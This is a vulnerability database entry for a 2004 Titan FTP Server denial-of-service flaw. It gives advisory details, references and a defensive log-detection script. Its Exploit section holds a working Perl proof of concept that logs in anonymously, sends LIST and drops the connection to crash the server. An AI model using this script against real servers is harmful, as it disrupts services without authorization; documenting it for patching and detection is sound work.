Titan FTP Server Vulnerability


Vulnerability ID 1107926 Vulnerability type Unknown
Published 2004-05-04 Updated 2004-07-07
CVE ID CVE-2004-0437
CNNVD-ID CNNVD-200407-007
Platform Windows CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/24080
https://www.securityfocus.com/bid/83157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-007
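|Vulnerability details
Titan FTP Server 3.01 build 163, and possibly other versions before build 169, contains a vulnerability. A remote authenticated user can cause a denial of service (crash) by disconnecting from the system during a "LIST -L" command, which causes Titan to access an invalid socket.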
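One way to spot the pattern described above (a LIST whose session drops before the listing completes) in FTP session logs. This is an added example, not code from the original page or from the vendor; the log line format, session names and the `aborted_listings` helper are assumptions made for the illustration.

```python
import re

# Constructed sample log. The line format "<time> <session> <C|S|X> <text>"
# is an assumption for this example, not Titan's own log format.
# C = client command, S = server reply, X = control connection closed.
SAMPLE_LOG = """\
10:00:01 s1 C USER anonymous
10:00:01 s1 S 331 Password required
10:00:02 s1 C PASS ****
10:00:02 s1 S 230 Logged in
10:00:03 s1 C LIST -L
10:00:03 s1 S 150 Opening data connection
10:00:03 s1 X closed
10:00:05 s2 C LIST
10:00:05 s2 S 150 Opening data connection
10:00:06 s2 S 226 Transfer complete
10:00:09 s2 C QUIT
10:00:09 s2 S 221 Goodbye
10:00:09 s2 X closed
10:00:11 s3 C LIST
10:00:11 s3 X closed
"""

LINE = re.compile(r"^(\S+)\s+(\S+)\s+([CSX])\s+(.*)$")
FINAL_REPLY = re.compile(r"^[245]\d\d\b")  # 1xx replies are only preliminary


def aborted_listings(log_text):
    """Return (session, time, command) for each LIST whose session closed
    before the server sent a final reply for it."""
    pending = {}  # session -> (time, command) of a LIST still in progress
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        time, sid, kind, text = m.groups()
        if kind == "C" and text.upper().split()[:1] == ["LIST"]:
            pending[sid] = (time, text)
        elif kind == "S" and sid in pending and FINAL_REPLY.match(text):
            del pending[sid]  # listing finished or was refused normally
        elif kind == "X" and sid in pending:
            hits.append((sid,) + pending.pop(sid))
    return hits


if __name__ == "__main__":
    for sid, time, cmd in aborted_listings(SAMPLE_LOG):
        print(f"{time} session {sid}: '{cmd}' aborted before completion")
```

An occasional aborted listing is normal client behaviour; on an affected build the useful signal is such an event immediately preceding a service crash or restart.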
|Exploit
source: http://www.securityfocus.com/bid/10272/info

Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.

A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.

#!/usr/bin/perl
# Test for Titan FTP server security vulnerability

use IO::Socket;

$host = "192.168.1.243";

# Commands to try, each terminated with CRLF as FTP requires
my @combination;
$combination[0] = "LIST \r\n";

for (my $i = 0; $combination[$i] ; $i++)
{
 print "Combination: $i\n";

 $remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2112",
     );
 unless ($remote) { die "cannot connect to ftp daemon on $host" }

 print "connected\n";
 # Wait for the 220 greeting
 while (<$remote>)
 {
  print $_;
  if (/220 /)
  {
   last;
  }
 }

 $remote->autoflush(1);

 my $ftp = "USER anonymous\r\n";

 print $remote $ftp;
 print $ftp;

 # Wait for the 331 password prompt
 while (<$remote>)
 {
  print $_;
  if (/331 /)
  {
   last;
  }
 }

 # Single quotes keep the '@' literal; the value is redacted on the page
 $ftp = 'PASS [email protected]' . "\r\n";
 print $remote $ftp;
 print $ftp;
 
 # Wait for the 230 login confirmation
 while (<$remote>)
 {
  print $_;
  if (/230 /)
  {
   last;
  }
 }
 
 $ftp = $combination[$i];

 print $remote $ftp;
 print $ftp;

 # Wait for the 150 reply, then close without completing the listing
 while (<$remote>)
 {
  print $_;
  if (/150 /)
  {
   last;
  }
 }

 close $remote;
}
|Affected products
South River Technologies Titan Ftp Server 3.01 Build 163
|References

Source: XF
Name: titan-list-command-dos(16057)
Link: http://xforce.iss.net/xforce/xfdb/16057
Source: www.securiteam.com
Link: http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
Source: BUGTRAQ
Name: 20040505 Titan FTP Server Aborted LIST DoS
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108378048513596&w=2
Source: VULNWATCH
Name: 20040505 Titan FTP Server Aborted LIST DoS
Link: http://archives.neohapsis.com/archives/vulnwatch/2004-q2/0025.html
